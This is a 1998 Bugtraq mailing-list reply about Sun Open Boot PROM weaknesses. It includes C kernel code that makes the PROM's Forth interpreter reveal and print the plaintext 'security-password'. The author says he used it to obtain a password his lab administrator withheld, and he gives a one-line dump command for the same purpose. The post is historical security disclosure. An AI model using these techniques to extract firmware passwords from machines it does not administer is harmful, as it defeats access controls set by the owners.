Bugtraq mailing list archives

Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53)


From: leendert () WATSON IBM COM (Leendert van Doorn)
Date: Mon, 13 Jul 1998 16:30:07 -0400


# Jericho Nunn wrote:
#
# >    Aside from the fact that it left me quite flabbergasted for quite
# >some time, mudge's OBP memory manipulation for acquiring root privileges
# >poses a serious risk for environments where SUN workstation consoles are
# >easily accessible to unprivileged individuals, such as university labs.
#
# This has been known for a long time. Indeed, some 7 years ago, whilst I
# was at university and in my more "cat and mouse" gaming moods, I used
# this trick and a prom password was promptly added.

Since we are on the subject of Open Boot PROM passwords: because of
a disagreement with the person who managed the pool of Sparc stations
we ran Amoeba on (he didn't want to give me the prom password, but I was
allowed to boot my own kernels), my own kernels contained the following
piece of code:

#ifndef NDEBUG
/*
 * Print the prom password so I know what it is when debugging a kernel.
 *
 * The OBP word "security-password" leaves (addr len) on the Forth stack;
 * the rest of the command stores len into pwdlen and copies the bytes
 * into pwd.  Pointers are passed to the PROM as hex addresses, which is
 * fine for 32-bit SPARC.  pwd is not NUL-terminated, hence the
 * character-by-character print below.
 */
void
print_password(void)
{
    char cmd[OBP_CMDLEN], pwd[8];   /* OBP passwords are at most 8 chars */
    int i, pwdlen = 0;              /* stays 0 if the PROM call does nothing */

    preprom();                      /* enter the PROM's environment */
    if (obp->op_interpret) {
        (void) sprintf(cmd,
            "security-password %x swap dup %x ! move", pwd, &pwdlen);
        obp->op_interpret(cmd);     /* let the PROM interpret the Forth string */
        if (pwdlen > 0) {
            printf("OBP Password = '");
            for (i = 0; i < pwdlen; i++)
                printf("%c", pwd[i]);
            printf("'\n");
        }
    }
    postprom();                     /* back to the kernel's environment */
}
#endif /* NDEBUG */

Yes, the prom password is unencrypted. "security-password dump" will
show the plaintext version.

        Leendert

--
Leendert van Doorn                                    <leendert () watson ibm com>
IBM T.J. Watson Research Center                       (914) 784-7831
30 Saw Mill River Road, Hawthorne, NY 10532
